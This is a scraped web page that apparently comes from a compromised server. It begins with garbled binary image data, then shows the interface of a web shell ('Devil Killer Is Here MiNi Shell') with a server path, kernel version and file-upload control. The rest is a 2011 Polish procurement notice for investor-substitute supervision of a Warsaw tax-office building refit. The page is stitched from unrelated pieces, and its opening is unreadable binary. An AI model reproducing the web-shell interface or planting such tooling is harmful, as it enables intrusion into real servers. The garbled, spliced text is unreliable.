JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110302/33288-N-2011.html

<p class="kh_header"><b>Warszawa: Pełnienie obowiązków Inwestora Zastępczego przy realizacji inwestycji  pn.: /Przebudowa budynku przy ul. Jagiellońskiej 55 w Warszawie na siedzibę Urzędu Kontroli Skarbowej w Warszawie/</b><br>
<b>Numer ogłoszenia: 33288 - 2011; data zamieszczenia: 02.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Kontroli Skarbowej w Warszawie , ul. Cybernetyki 19B, 02-677 Warszawa, woj. mazowieckie, tel. 022 207 95 10, faks 022 207 95 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uks.wawa.ibip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków Inwestora Zastępczego przy realizacji inwestycji  pn.: /Przebudowa budynku przy ul. Jagiellońskiej 55 w Warszawie na siedzibę Urzędu Kontroli Skarbowej w Warszawie/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków Inwestora Zastępczego przy realizacji inwestycji pn.: /Przebudowa budynku przy ul. Jagiellońskiej 55 w Warszawie na siedzibę Urzędu Kontroli Skarbowej w Warszawie/.
Inwestorowi zastępczemu powierzone zostaną następujące zadania:
1) Zorganizowanie i przeprowadzenie postępowania przetargowego zgodnie z przepisami ustawy prawo zamówień publicznych na wykonanie wielobranżowego projektu wykonawczego przebudowy budynku przy ul. Jagiellońskiej 55 w Warszawie wraz
z uzyskaniem niezbędnych uzgodnień i pozwoleń określonych przepisami prawa budowlanego, między innymi:
a) Sprawdzenie i ocena kompletności oraz zaproponowanych rozwiązań koncepcji programowo-przestrzennej wraz z programem funkcjonalno-użytkowym przebudowy przedmiotowego budynku;
b) Zlecenie wykonania mapy zasadniczej do celów projektowych;
c) Sporządzenie specyfikacji istotnych warunków zamówienia i wzoru umowy;
d) Udział w pracach komisji przetargowej;
e) Przygotowanie korespondencji z wykonawcami w trakcie postępowania;
f) Przygotowanie rozstrzygnięcia postępowania;
g) Sporządzenie protokołu z postępowania;
h) Przygotowanie umowy z wybranym wykonawcą.
Zamawiający akceptuje przedłożoną SIWZ oraz wzór umowy, przedstawiciele Zamawiającego wchodzą w skład komisji przetargowej, Dyrektor Zamawiającego wybiera najkorzystniejszą ofertę i podpisuje umowę z wykonawcą projektu. 

2) Odbiór projektu wykonawczego wraz z niezbędnymi uzgodnieniami i pozwoleniami oraz sprawdzenie i ocena poprawności wykonania powyższych dokumentów,
między innymi:
a) Sprawdzenie kompletności oraz poprawności wykonania projektu;
b) Wskazanie i wyegzekwowanie ewentualnych zmian lub poprawek w przedłożonej dokumentacji projektowej;
c) Protokolarny odbiór projektu oraz niezbędnych pozwoleń.

3) Zorganizowanie i przeprowadzenie postępowania przetargowego zgodnie z przepisami ustawy prawo zamówień publicznych na wyłonienie wykonawcy robót,
między innymi:
a) Sporządzenie specyfikacji istotnych warunków zamówienia i wzoru umowy;
b) Udział w pracach komisji przetargowej;
c) Przygotowanie korespondencji z wykonawcami w trakcie postępowania;
d) Przygotowanie rozstrzygnięcia postępowania;
e) Sporządzenie protokołu z postępowania;
f) Przygotowanie umowy z wybranym wykonawcą.
Zamawiający akceptuje przedłożoną SIWZ oraz wzór umowy, przedstawiciele Zamawiającego wchodzą w skład komisji przetargowej, Dyrektor Zamawiającego wybiera najkorzystniejszą ofertę i podpisuje umowę z wykonawcą projektu. 

4) Wykonywanie czynności zastępstwa inwestycyjnego oraz nadzoru inwestorskiego
w trakcie przeprowadzania prac budowlanych, między innymi:
a) Wyznaczenie i sprawowanie nadzoru inwestorskiego nad wszystkimi branżami (elektryczną, wodno-kanalizacyjną, ogólnobudowlaną, centralnego ogrzewania
i wentylacyjną oraz innymi);
b) Wyznaczenie inspektora nadzoru, koordynującego nadzór we wszystkich branżach;
c) Zaznajomienie zespołu wyznaczonych inspektorów z poszczególnych branż
z dokumentacją projektową, terenem budowy, jego uzbrojeniem i przebiegiem instalacji, warunkami określonymi w pozwoleniu na budowę oraz warunkami technicznych przyłączenia poszczególnych mediów. 
d) Aktualizacja przedmiarów robót i kosztorysów inwestorskich;
e) Protokolarne przekazanie terenu robót wykonawcy;
f) Koordynowanie prac wykonywanych przez wykonawcę i podwykonawców;
g) Wnioskowanie do zatwierdzenia przez Zamawiającego uzgodnionych z autorem projektu wszelkich zmian wnoszonych przez uczestników procesu inwestycyjnego oraz sporządzanie przy udziale przedstawicieli Zamawiającego protokołów z powyższych uzgodnień;
h) Sprawowanie nadzoru technicznego i finansowego nad realizacją inwestycji zgodnie
z wymogami ustawy Prawo Budowlane, warunkami technicznymi wykonania
i odbioru prac ze szczególnym uwzględnieniem kontroli jakości wykonywanych robót
i zgodności z dokumentacją projektową;
i) Dokumentowanie przebiegu robót budowlanych poprzez bieżące nanoszenie wpisów do dziennika budowy oraz wykonywanie dokumentacji fotograficznej i opisowej potwierdzającej jakość i zgodność wykonania poszczególnych prac z projektem,
w szczególności sukcesywna dokumentacja i odbiór prac, instalacji i urządzeń ulegających zakryciu przed ich odbiorem częściowym lub końcowym;
j) Nadzór nad zapewnieniem bezpieczeństwa i przestrzegania przepisów przeciw pożarowych, bezpieczeństwa i higieny pracy, przez wszystkich uczestników realizacji procesu inwestycji;
k) Prowadzenie narad roboczych z kierownikiem budowy, kierownikami poszczególnych robót lub z przedstawicielami wykonawcy i podwykonawców na terenie budowy oraz kontrola realizacji ustaleń z tych narad;
l) Wydawanie kierownikowi budowy lub kierownikom robót poleceń, potwierdzonych wpisem do dziennika budowy.
m) Wstrzymywanie robót budowlanych w przypadku, gdyby ich kontynuowanie mogło wywołać zagrożenie, bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;
n) Kontrola terminowości i zgodności przebiegu procesu budowlanego z przyjętym harmonogramem i podpisanymi umowami;
o) Egzekwowanie od projektantów pełnienia obowiązku nadzoru autorskiego, w razie potrzeby wzywanie projektanta na budowę, kierowanie do projektanta zastrzeżeń do projektu, zgłoszonych przez wykonawców lub Zamawiającego i dokonywanie z nim stosownych uzgodnień lub wyjaśnień;
p) Dokonywanie czynności sprawdzania, wyceny i kalkulacji robót dodatkowych
i przekazywanie wyliczeń i uzasadnienia konieczności przeprowadzenia prac dodatkowych do akceptacji przez Zamawiającego;
r) Inicjowanie wprowadzania zmian do treści umów zawartych z wykonawcami inwestycji, poprzez przygotowanie stosownych aneksów do tych umów, zgodnych
z ustawą prawo zamówień publicznych;
s) Informowanie Zamawiającego o przebiegu realizacji inwestycji;
t) Składanie miesięcznych sprawozdań z przebiegu realizacji inwestycji;
u) Kontrola zaawansowania robót, ich ilości i jakości oraz potwierdzanie
i opisywanie faktur do celów rozliczeniowych i przedstawianie ich Zamawiającemu do akceptacji i dokonania płatności;
w) Sprawdzanie i egzekwowanie od wykonawców przedstawienia wymaganych dokumentów, certyfikatów, atestów, aprobat technicznych, świadectw jakości materiałów i urządzeń oraz ich instrukcji obsługi i eksploatacji przed ich wbudowaniem;
x) Częściowe i końcowe, protokolarne odbiory prac, zgodne z harmonogramem prac
i zawartymi umowami;
y) Uzyskanie od wykonawcy prac budowlanych kompletnej dokumentacji powykonawczej, wraz z potwierdzonymi przez projektanta zmianami w stosunku do projektu budowlanego;
z) Nadzór nad usuwaniem przez wykonawcę prac budowlanych usterek
i sporządzanie odpowiednich protokołów;
aa) Naliczanie i egzekwowanie w imieniu Zamawiającego kar umownych i/lub odszkodowań od wykonawcy na rzecz Zamawiającego;
ab) Opracowanie opinii dotyczących wad obiektu uznanych za nie nadające się do usunięcia oraz wnioskowanie o obniżenie wynagrodzenia wykonawcy z określeniem utraty wartości robót i kwot obniżonego wynagrodzenia za te roboty;
ac) Finansowe rozliczenie inwestycji;
ad) Archiwizację korespondencji oraz dokumentacji i przekazanie jej Zamawiającemu w stanie kompletnym po zakończeniu inwestycji;
ae) Zawiadomienie organów nadzoru budowlanego o zakończeniu budowy
i uzyskanie decyzji o pozwoleniu na użytkowanie inwestycji (w przypadku takiego obowiązku) oraz udział w uzyskaniu wszystkich wymaganych przepisami prawa decyzji administracyjnych, opinii, uzgodnień, stanowisk organów administracyjnych po zakończeniu procesu prac budowlanych;
af) Występowanie w imieniu Zamawiającego przed organami administracji i przed sądami, w sprawach wynikających z realizacji inwestycji, w granicach udzielonych pełnomocnictw;

5) Egzekwowanie w imieniu Zamawiającego przysługujących praw z tytułu udzielonej gwarancji i rękojmi od Wykonawcy inwestycji (likwidacja zauważonych podczas eksploatacji budynku usterek);

6) Wykonywanie w imieniu i na rzecz Zamawiającego czynności faktycznych
i prawnych koniecznych dla wykonania zadania inwestycyjnego, nawet jeśli nie zostały one wymienione w treści specyfikacji istotnych warunków zamówienia, a ich wykonanie jest w interesie Zamawiającego lub są konieczne dla zabezpieczenia interesów Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.24.80.00-8, 71.24.20.00-6, 71.63.13.00-3, 71.54.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości 5000,00 zł (słownie: pięć tysięcy zł). 
Wadium może być wnoszone w formach, o których mowa w art. 45 ust. 6 Ustawy Prawo zamówień publicznych.
Zwrot wadium nastąpi zgodnie z art. 46 Ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, iż osoby, które będą uczestniczyć w wykonaniu zamówienia (wymienione  w załączniku nr 5 do SIWZ), posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru stanowiącego załącznik nr 5 do SIWZ. Zamawiający dokona oceny spełniania warunków udziału
w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wykazu wykonanych prac podobnych z zakresie niezbędnym  do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców według wzoru stanowiącego załącznik nr 4 do SIWZ oraz załączeniem dokumentów potwierdzającego, że usługi te zostały wykonane należycie, np. protokoły odbioru prac, referencje.
Zgodnie z rozdziałem I, ust. 5 pkt. 2 siwz za prace podobne zamawiający uzna: zrealizowanie minimum 2 zamówień obejmujących usługi pełnienia funkcji inwestora zastępczego oraz funkcji nadzoru inwestorskiego nad budową lub przebudową budynków biurowych lub użyteczności publicznej o łącznej wartości inwestycji nie mniejszej niż 20 mln zł brutto oraz o kubaturze budynku nie mniejszej niż 5.000,00 m3.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od tego czy są one zatrudnione bezpośrednio przez wykonawcę, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z oświadczeniem, iż osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru, stanowiącego załącznik nr 5 do SIWZ. 
Wykonawca wypełni obowiązek wykazania, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia, jeżeli wykaże co najmniej po jednej osobie na każde wymienione poniżej stanowisko: 
a)  Inspektora nadzoru w branży architektonicznej,
b) Inspektora nadzoru w branży konstrukcyjno-budowlanej,
c) Inspektora nadzoru w branży sanitarnej w specjalnościach w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych,
d) Inspektora nadzoru w branży elektrycznej,
e) Inspektora nadzoru w branży klimatyzacyjnej i wentylacyjnej.
	Wymagane kwalifikacje i doświadczenie: Uprawnienia do nadzorowania robót budowlanych w odpowiednich branżach i specjalnościach,  przynależność do właściwej izby samorządu zawodowego oraz udokumentowane 3 letnie doświadczenie zawodowe w nadzorowaniu poszczególnych robót budowlanych.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie kopii opłaconej polisy, a w przypadku jej braku na podstawie innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (odpowiedzialność kontraktowa i deliktowa) na kwotę nie niższą niż 1.000.000,00 zł. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż: 
a) w przypadku zmiany stawek podatku VAT w trakcie realizacji umowy, dopuszcza się możliwość zmiany wartości zamówienia w wysokości odpowiadającej z zastosowania zmienionej stawki podatku VAT na cenę zamówienia netto. Powyższa zmiana powinna zostać wprowadzona w formie pisemnego aneksu do umowy;
b) Zamawiający dopuszcza po pierwszym roku obowiązywania umowy możliwość waloryzacji ryczałtowego wynagrodzenia brutto. Wynagrodzenie może zostać zwaloryzowane raz w roku o wartość średniorocznego wskaźnika cen towarów i usług konsumpcyjnych ogłaszanego do 31 stycznia każdego roku w komunikacie Prezesa Głównego Urzędu Statystycznego i publikowanego w Dzienniku Urzędowym RP Monitor Polski. Powyższa zmiana powinna zostać wprowadzona w formie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uks.wawa.ibip.net.pl<br>
